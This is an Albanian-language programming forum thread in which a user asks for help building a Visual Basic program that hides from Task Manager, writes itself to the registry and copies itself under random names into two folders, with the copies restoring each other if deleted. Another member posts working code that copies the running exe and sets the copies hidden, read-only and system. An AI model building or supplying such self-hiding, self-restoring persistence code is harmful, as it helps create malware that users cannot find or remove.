Close
Duke shfaqur rezultatin -9 deri 0 prej 10
  1. #1
    Heavily Equipped Maska e Force-Intruder
    Anëtarësuar
    04-11-2002
    Postime
    4,910

    Cool VB - Si të kopjoj një skedar; si të vendos vbAttribute

    Pershendetje te gjitheve !

    Kisha nje pyetje per ata qe merren me VB. Para disa ditesh po mundohesha te ndertoja nje exe dhe ndesha me kete problem "te vogel" . Ne fakt do te ishte si nje tip serveri i vogel "persistent". Fillimisht do fshihej sa te mundej nga proccess listi i XP (me emer tjeter) komplet nga PL i 9X apo Me, do te fshihej nga TSKMNGR, do te shkruant te dhena ne REG te pakten ne 2 vende dhe pjesa kryesore : do te kopjonte veten e tij ne dy vende ne sistem. Keto dy skedare te tjere do te kontrollonin ekzistencen e njeri tjerit dhe REG dhe ne rast fshirje do te benin menjehere restore. Nejse u zgjata shume me kete se ne fakt problemi im qendron tek Emertimi random, por desha te jap vetem nje ide.

    Bukur edhe emertimi random nuk eshte problem, i tregoj qe duhet te sajoje nje emer random nga te themi me 8 shkronja, ta kopjoje ate ne filan direktori e ben mirepo kur vjen puna ti vendose ketij te fundit atribute fjala vjen si shembulli :

    If Dir(DirektoriaWin & "\Start Menu\Programs\StartUp\", vbDirectory) <> "" Then
    SetAttr DirektoriaWin & "\Start Menu\Programs\StartUp\", vbHidden Or vbReadOnly Or vbSystem


    nuk e ben. Ndonje ide mbi kete do te ishte mese e mirepritur
    Faleminderit qe tani sidoqofte
    Gjithe te mirat!

  2. #2
    Programues Softueresh Maska e edspace
    Anëtarësuar
    04-04-2002
    Vendndodhja
    Filadelfia, SHBA
    Postime
    2,565
    Të nxjerr ndonjë gabim? psh: File not found.

    Provoje njëherë StartUp pa \ e fundit.

    Sigurohu që kushti i IF është i vërtetë dhe që SetAttr po ekzekutohet. Vër ndonjë msgbox në vënd të SetAttr dhe shiko nqs do hapet apo jo.

    Ka mundësi që startup të jetë e mbrojtur nga windowsi, prandaj provo ndonjë dosje tjetër.
    Ndryshuar për herë të fundit nga edspace : 15-09-2004 më 14:55
    Edi

  3. #3
    Heavily Equipped Maska e Force-Intruder
    Anëtarësuar
    04-11-2002
    Postime
    4,910
    Jo Edi nuk besoj se eshte ndonje gabim i rende perderisa gjate ekzekutimit shfaq vetem nje mesazh info ku thote : se atribute si ato te mesipermet nuk mund ti aplikohen skedarit dhe debuggeri me ndricon pikerisht rreshtin e meposhtem psh :

    Gjat = 7
    G = 0
    txtEmri.Text = ""
    Do
    G = G + 1
    Randomize
    Kap = CInt(Rnd * 25) + 97
    txtEmri.Text = txtEmri & Chr(Kap)
    Loop Until G = Val(Gjat)
    EmriRandomPerSkedarin=txtEmri.Text


    Nuk di cfare te them do te kontrolloj eshe njehere tjeter kodin e FSO.
    Faleminderit per Interesimin sidoqofte...

  4. #4
    i/e regjistruar Maska e ICE-BOY
    Anëtarësuar
    01-09-2004
    Postime
    51

    hi

    o lal , shiko se per ti ven atributet nuk eshte e thene qe do perdoresh komanda ne VB, mund edhe ta beshe me ane te dosit ,
    Nqs mban mend ate progg e ndertuar ne vb qe me ke derguar mua pak koh me pare :

    open "c:\abc.txt" for output as #1
    Print #1, "Attrib (ketu do vendosesh te dhenat se kujt do i vesh atribute dhe llojn)
    close #1
    riemeroje kete skedar ne .bat dhe bej shell

    Nuk edi nqs do te hy ne pun , pasi nuk pata koh shum ti rilexoja edhe nje here ate qe ke shkruar me lart .

    Bye

  5. #5
    Programues Softueresh Maska e edspace
    Anëtarësuar
    04-04-2002
    Vendndodhja
    Filadelfia, SHBA
    Postime
    2,565
    Unë nuk e kam VB të instaluar por përdora Access dhe kodi më poshtë punoi shkëlqyer.
    Shiko ndryshoje sipas asaj që kërkon të bësh.

    Kodi:
    Dim txtEmri As String
    Dim gjat As Integer
    Dim g As Integer
    
    gjat = 7
    g = 0
    txtEmri = ""
    
    Do
        g = g + 1
        Randomize
        Kap = CInt(Rnd * 25) + 97
        txtEmri = txtEmri & Chr(Kap)
    Loop Until g = Val(gjat)
    
    emrirandomperskedarin = txtEmri & ".exe"
    
    Open "C:\" & emrirandomperskedarin For Output As #1
    Close #1
    
    SetAttr "C:\" & emrirandomperskedarin, vbHidden Or vbReadOnly Or vbSystem
    Edi

  6. #6
    Heavily Equipped Maska e Force-Intruder
    Anëtarësuar
    04-11-2002
    Postime
    4,910
    Po Edi ai kod punon me siguri po une nuk kam per qellim te krijoj nje exe 0-bytes por nje kopje identike te vete memes. Thashe, edhe vete, e parandjej qe diku po bej nje gabim foshnjarak po kur e shikoj me duket gjithmone ne rregull. Nejse faleminderit cuna.

  7. #7
    Programues Softueresh Maska e edspace
    Anëtarësuar
    04-04-2002
    Vendndodhja
    Filadelfia, SHBA
    Postime
    2,565
    Si po mundohesh të bësh kopjen nga vetvetja?

    Ka mundësi që sistemi operativ të bllokojë aksesin e programit origjinal sepse ajo po ekzekutohet në memorje. Ndërkaq ti po mundohesh ta hapësh përsëri për ti bërë një kopje.

    E ke problemin se nuk krijohet kopja apo se nuk vendos dot vetitë (attributes)?
    Edi

  8. #8
    Heavily Equipped Maska e Force-Intruder
    Anëtarësuar
    04-11-2002
    Postime
    4,910
    Edhe njehere ta themi me shkurt : exe e ketij projekti, kur te behet run, do te beje 2 kopje te tjera te vetvetes (ky nuk eshte problem, i ben edhe kur eshte i ngarkur ne memorje) ne dy direktori te ndryshme, pastaj do te zgjedhe nje emer random per to (sic e pe edhe vete), pastaj do tu vendose emrin dhe ne fund atributet.... me duket se te kjo rradhe qendron edhe mangesia ime... niveli i gabimit eshte i ulet..VB me lajmeron vetem qe nuk mund ti vendose atribute atyre skedareve...(kur nuk i ve atribute punon ne rregull)

    degjo me duket se kur une mundohem te vendos atributet kopjet nuk jan shkruajtur ende.... me duket se ky eshte problemi...papapa do ta le fare se me merziti...

  9. #9
    Programues Softueresh Maska e edspace
    Anëtarësuar
    04-04-2002
    Vendndodhja
    Filadelfia, SHBA
    Postime
    2,565
    E ndryshova kodin që shkruajta më lart që të bëjë atë që do ti.
    Që të punojë kodi, supozojmë që programi që po bën run tani quhet hh.exe dhe ndodhet në C:\

    Ky program do bëjë kopje të vetes së tij tek dosjet C:\dosje_e_fshehte\ dhe C:\dosje_tjeter_e_fshehte\. Emrat e kopjeve do zgjidhen rastësisht nga kompjuteri me kodin që kishe shkruajtur ti.

    E provova dhe punon si duhet. Ty të ngelet të ndryshosh vetëm adresat e dosjeve sipas atyre që po përdor.

    Kodi:
    Private Sub Form_Load()
    
    Dim txtEmri As String
    Dim emrirandomperskedarin As String
    Dim emrirandomperskedarin2 As String
    
    Dim gjat As Integer
    Dim g As Integer
    Dim kap As Integer
    
    gjat = 7
    g = 0
    txtEmri = ""
    
    Do
        g = g + 1
        Randomize
        kap = CInt(Rnd * 25) + 97
        txtEmri = txtEmri & Chr(kap)
    Loop Until g = Val(gjat)
    
    emrirandomperskedarin = txtEmri & ".exe"
    
    gjat = 7
    g = 0
    txtEmri = ""
    
    Do
        g = g + 1
        Randomize
        kap = CInt(Rnd * 25) + 97
        txtEmri = txtEmri & Chr(kap)
    Loop Until g = Val(gjat)
    
    emrirandomperskedarin2 = txtEmri & ".exe"
    
    FileCopy "C:\hh.exe", "C:\dosje_e_fshehte\" & emrirandomperskedarin
    FileCopy "C:\hh.exe", "C:\dosje_tjeter_e_fshehte\" & emrirandomperskedarin2
    
    SetAttr "C:\dosje_e_fshehte\" & emrirandomperskedarin, vbHidden Or vbReadOnly Or vbSystem
    SetAttr "C:\dosje_tjeter_e_fshehte\" & emrirandomperskedarin2, vbHidden Or vbReadOnly Or vbSystem
    
    End Sub
    Edi

  10. #10
    Heavily Equipped Maska e Force-Intruder
    Anëtarësuar
    04-11-2002
    Postime
    4,910
    LOOOOOOL

    Edi, edhe ju cuna me falni.............

    emrirandomperskedarin = txtEmri & ".exe"

    Kisha harruar & ".exe" LoL.... Po tani punon... edhe njehere me falni ishte qesharake... Nejse Faleminderit qe me ndicove EDI... Temen mund ta fshish fare tani...
    oooopppsss ...

    Atehere Shendet e gjithe te mirat !

Tema të Ngjashme

  1. Kushtetuta e Kaçanikut, themelet e shtetit shqiptar në Kosovë
    Nga SkyThinks në forumin Kulturë demokratike
    Përgjigje: 2
    Postimi i Fundit: 27-05-2016, 15:32
  2. Greqia vendos të shesë pronat e shqiptarëve
    Nga Xhuxhumaku në forumin Çështja kombëtare
    Përgjigje: 10
    Postimi i Fundit: 29-10-2005, 13:28

Regullat e Postimit

  • Ju nuk mund të hapni tema të reja.
  • Ju nuk mund të postoni në tema.
  • Ju nuk mund të bashkëngjitni skedarë.
  • Ju nuk mund të ndryshoni postimet tuaja.
  •